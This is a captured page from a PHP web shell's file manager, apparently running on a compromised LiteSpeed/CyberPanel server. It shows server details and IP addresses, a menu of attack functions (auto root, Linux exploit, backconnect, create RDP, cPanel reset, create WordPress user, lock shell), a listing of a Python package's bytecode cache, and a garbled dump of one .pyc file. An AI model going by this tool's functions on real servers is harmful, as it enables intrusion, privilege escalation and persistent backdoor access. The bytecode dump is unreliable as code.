Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
click /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
2.6
KB
-rw-r--r--
_compat.cpython-310.pyc
15.34
KB
-rw-r--r--
_termui_impl.cpython-310.pyc
15.67
KB
-rw-r--r--
_textwrap.cpython-310.pyc
1.48
KB
-rw-r--r--
_unicodefun.cpython-310.pyc
2.23
KB
-rw-r--r--
_winconsole.cpython-310.pyc
7.46
KB
-rw-r--r--
core.cpython-310.pyc
86.97
KB
-rw-r--r--
decorators.cpython-310.pyc
13.93
KB
-rw-r--r--
exceptions.cpython-310.pyc
9.93
KB
-rw-r--r--
formatting.cpython-310.pyc
9.21
KB
-rw-r--r--
globals.cpython-310.pyc
2.36
KB
-rw-r--r--
parser.cpython-310.pyc
13.33
KB
-rw-r--r--
shell_completion.cpython-310.p...
16.13
KB
-rw-r--r--
termui.cpython-310.pyc
26.18
KB
-rw-r--r--
testing.cpython-310.pyc
14.79
KB
-rw-r--r--
types.cpython-310.pyc
32.37
KB
-rw-r--r--
utils.cpython-310.pyc
17.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : decorators.cpython-310.pyc
o �+ca: � @ s� d dl Z d dlZd dlZd dlmZ d dlmZ ddlm Z ddlm Z ddlmZ ddlmZ dd lm Z dd lmZ ddlmZ ddlmZ ejd ejdejf d�Ze�dejdejf e �Zdedefdd�Zdedefdd�Z dAdejdeddfdd�Zdd�dedeje ddfd d!�Zded"eje d#ej eejf d$eje de f d%d&�Z! dBd"eje d$ejeje d#ejdejege f fd'd(�Z"dCd"eje d#ejdejegef fd)d*�Z#ded+eddfd,d-�Z$d.ed#ejdejegef fd/d0�Z%d.ed#ejdejegef fd1d2�Z&d.ed3ejdejegef fd4d5�Z'd.ed3ejdejegef fd6d7�Z( dCdddd8�d9eje d.ed:eje d;eje d<eje d3ejdejegef fd=d>�Z)d.ed3ejdejegef fd?d@�Z*dS )D� N)�update_wrapper)�gettext� )�Argument)�Command)�Context)�Group)�Option)� Parameter��get_current_context)�echo�F.)Zbound�FC�f�returnc � � fdd�}t t�t|�� �S )z]Marks a callback as wanting to receive the current context object as first argument. c s � t � g| �R i |��S �Nr ��args�kwargs�r � �2/usr/lib/python3/dist-packages/click/decorators.py�new_func s zpass_context.<locals>.new_func�r �t�castr �r r r r r �pass_context s r c r )z�Similar to :func:`pass_context`, but only pass the object on the context onwards (:attr:`Context.obj`). This is useful if that object represents the state of a nested system. c s � t � jg| �R i |��S r )r �objr r r r r % s zpass_obj.<locals>.new_funcr r r r r �pass_obj s r! F�object_type�ensurezt.Callable[[F], F]c � dt dt f� �fdd�}|S )a. Given an object type this creates a decorator that will work similar to :func:`pass_obj` but instead of passing the object of the current context, it will find the innermost context of type :func:`object_type`. This generates a decorator that works roughly like this:: from functools import update_wrapper def decorator(f): @pass_context def new_func(ctx, *args, **kwargs): obj = ctx.find_object(object_type) return ctx.invoke(f, obj, *args, **kwargs) return update_wrapper(new_func, f) return decorator :param object_type: the type of the object to pass. :param ensure: if set to `True`, a new object will be created and remembered on the context if it's not there yet. r r c s"